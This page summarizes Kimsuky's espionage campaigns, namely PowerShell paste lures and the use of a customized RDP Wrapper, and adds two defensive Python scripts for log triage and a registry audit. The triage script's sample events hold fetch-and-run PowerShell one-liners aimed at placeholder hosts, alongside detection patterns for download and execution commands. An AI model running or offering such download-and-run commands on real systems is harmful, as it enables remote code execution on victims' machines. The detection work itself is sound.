The North Korea-linked APT group Kimsuky, also tracked as Emerald Sleet, is using a new tactic against its traditional espionage targets: tricking them into running PowerShell as an administrator and executing attacker-supplied code. The operators first build rapport with a target, then send a spear-phishing email with an attached PDF. The PDF carries a "registration" link whose page instructs the target to open PowerShell as an administrator and paste code provided by the group. If the target complies, the code downloads and installs a browser-based remote desktop tool, giving the threat actor access to the device and a channel for data exfiltration. Because the victim types the command into an elevated console themselves, there is no exploit and no malicious attachment payload for endpoint controls to catch; the useful telemetry is PowerShell Script Block Logging and process-creation events showing an elevated, interactively launched shell that downloads and then runs something.
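The pasted-command chain described above leaves a recognizable shape in logs: an elevated PowerShell started from an interactive shell, a download primitive, and an execution or install primitive in the same script block. The following is an added triage example, not code from the original report or from any vendor; the event records, hostnames, users and URLs are constructed placeholders that imitate Script Block Logging (Event ID 4104) enriched with the integrity level and parent image you would get from Sysmon Event ID 1 or Security Event ID 4688.

```python
import re
from dataclasses import dataclass, field

# Constructed sample records (not real telemetry). Each stands in for one
# PowerShell Script Block Logging event (Event ID 4104) joined with the
# process's integrity level and parent image. Hosts, users and URLs are
# placeholders chosen for the example.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "integrity": "High", "parent": "explorer.exe",
     "script": "iwr https://example.invalid/reg/setup.zip -OutFile $env:TEMP\\s.zip; "
               "Expand-Archive $env:TEMP\\s.zip $env:TEMP\\s; Start-Process $env:TEMP\\s\\agent.exe"},
    {"host": "ws02", "user": "bob", "integrity": "Medium", "parent": "explorer.exe",
     "script": "Get-ChildItem C:\\Users\\bob\\Documents | Measure-Object"},
    {"host": "srv03", "user": "svc_deploy", "integrity": "High", "parent": "services.exe",
     "script": "Invoke-WebRequest https://updates.example.invalid/pkg.msi -OutFile C:\\pkg\\pkg.msi"},
    {"host": "ws04", "user": "carol", "integrity": "High", "parent": "explorer.exe",
     "script": "$c=New-Object Net.WebClient; IEX $c.DownloadString('https://example.invalid/r.ps1')"},
]

# Download primitives commonly seen in pasted one-liners.
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer)\b"
    r"|Net\.WebClient|DownloadString|DownloadFile|HttpClient"
)
# Primitives that turn the download into running code or an installed tool.
EXEC_RE = re.compile(
    r"(?i)\b(?:Start-Process|Invoke-Expression|iex|msiexec|Expand-Archive|rundll32)\b"
    r"|\.exe\b"
)
# A person pasting into an elevated console launches PowerShell from a shell,
# not from a service or scheduler; that separates the lure from automation.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}


@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: list = field(default_factory=list)


def score_event(ev):
    """Return (score, reasons) for one script-block event."""
    reasons = []
    script = ev.get("script", "")
    if ev.get("integrity") == "High":
        reasons.append("elevated")
    if DOWNLOAD_RE.search(script):
        reasons.append("download")
    if EXEC_RE.search(script):
        reasons.append("exec")
    if ev.get("parent", "").lower() in INTERACTIVE_PARENTS:
        reasons.append("interactive")
    return len(reasons), reasons


def triage(events, min_score=3):
    """Flag events that look like an elevated, user-pasted download-and-run chain.

    Both a download and an execution primitive must be present; a bare
    elevated download (e.g. a deployment service fetching an MSI) is not flagged.
    """
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= min_score and {"download", "exec"} <= set(reasons):
            findings.append(Finding(ev["host"], ev["user"], score, reasons))
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host}\t{f.user}\tscore={f.score}\t{','.join(f.reasons)}")
```

The two workstation events are flagged; the service-launched MSI download on srv03 scores only "elevated" and "download" and is left alone. Tune the regexes to your environment's admin tooling before relying on the score, and treat the result as a triage queue rather than a verdict.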
Kimsuky is also using a customized build of RDP Wrapper together with proxy tools to reach infected machines. RDP Wrapper enables Remote Desktop on Windows editions that do not offer it natively, and the proxy component lets the operators reach hosts that are not directly exposed, so together they let the group bypass network restrictions and keep persistent, interactive access.
Kimsuky, a North Korean state-sponsored hacking group, conducted a targeted campaign (tracked as "DEEP#DRIVE") against South Korean entities in the business, government, and cryptocurrency sectors. The campaign relied on spear-phishing emails carrying malicious PDF documents and on PowerShell code execution on the victim's machine, and it underlines the persistent threat from state-sponsored actors that focus on specific sectors.
AhnLab's ASEC team has documented Kimsuky's use of a customized RDP Wrapper and proxy tools to gain unauthorized, persistent access to infected machines for espionage. The intrusions begin with spear-phishing, including malicious shortcut (.LNK) files disguised as legitimate documents, and ASEC has published a blog post detailing additional malware used alongside these tools. The group's tooling continues to evolve while its targeting stays consistent.
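The RDP Wrapper technique in the two items above works by pointing the Terminal Services service at a replacement DLL instead of the stock termsrv.dll, which is something a host audit can check directly. The following is an added example, not code from ASEC or from the page; it audits constructed registry snapshots for three hypothetical hosts and, on Windows, can read the same two keys live. The stock install path shown for rdpwrap.dll is illustrative, and because the page says the group's build is customized, the check keys on the ServiceDll value itself rather than on the file name.

```python
import re

try:
    import winreg  # Windows only; elsewhere only the snapshot path is used
except ImportError:
    winreg = None

TERMSERVICE_PARAMS = r"SYSTEM\CurrentControlSet\Services\TermService\Parameters"
TERMINAL_SERVER = r"SYSTEM\CurrentControlSet\Control\Terminal Server"

# Constructed registry snapshots for three hypothetical hosts (not real data).
# "clean-ws" is a stock system; "wrapped-ws" has the default RDP Wrapper
# install; "renamed-ws" imitates a customized build that avoids the name.
SNAPSHOTS = {
    "clean-ws": {
        TERMSERVICE_PARAMS: {"ServiceDll": r"%SystemRoot%\System32\termsrv.dll"},
        TERMINAL_SERVER: {"fDenyTSConnections": 1},
    },
    "wrapped-ws": {
        TERMSERVICE_PARAMS: {"ServiceDll": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},
        TERMINAL_SERVER: {"fDenyTSConnections": 0},
    },
    "renamed-ws": {
        TERMSERVICE_PARAMS: {"ServiceDll": r"C:\Windows\System32\drivers\etc\svchelper.dll"},
        TERMINAL_SERVER: {"fDenyTSConnections": 0},
    },
}

# Only the stock location counts as genuine, whether written with the
# %SystemRoot% variable or an expanded drive path.
_GENUINE = re.compile(r"^(?:%systemroot%|[a-z]:\\windows)\\system32\\termsrv\.dll$")


def servicedll_is_genuine(value):
    """True only when TermService is still backed by the stock termsrv.dll."""
    if not value:
        return False
    return bool(_GENUINE.match(value.strip().lower().replace("/", "\\")))


def audit(snapshot):
    """Return a list of finding strings for one host's registry snapshot."""
    findings = []
    dll = snapshot.get(TERMSERVICE_PARAMS, {}).get("ServiceDll")
    if not servicedll_is_genuine(dll):
        findings.append(f"TermService ServiceDll is not termsrv.dll: {dll!r}")
    if "rdpwrap" in (dll or "").lower():
        findings.append("ServiceDll path names RDP Wrapper explicitly")
    deny = snapshot.get(TERMINAL_SERVER, {}).get("fDenyTSConnections")
    if deny == 0 and findings:
        findings.append("Remote Desktop is enabled while the service DLL is replaced")
    return findings


def live_snapshot():
    """Read the same two keys from the local registry (Windows only)."""
    if winreg is None:
        raise RuntimeError("winreg is only available on Windows")
    snap = {}
    wanted = ((TERMSERVICE_PARAMS, ["ServiceDll"]), (TERMINAL_SERVER, ["fDenyTSConnections"]))
    for key, names in wanted:
        snap[key] = {}
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
            for name in names:
                try:
                    snap[key][name] = winreg.QueryValueEx(k, name)[0]
                except FileNotFoundError:
                    pass  # value absent; audit() treats a missing ServiceDll as suspicious
    return snap


if __name__ == "__main__":
    for host, snap in SNAPSHOTS.items():
        print(host, audit(snap) or ["OK"])
```

A replaced ServiceDll is the strong signal; the enabled-RDP finding is only reported when the DLL check already failed, so a normally administered host with Remote Desktop turned on does not generate noise. Pair this with a file-signature check on whatever DLL the value points to, since a renamed wrapper will not be caught by name.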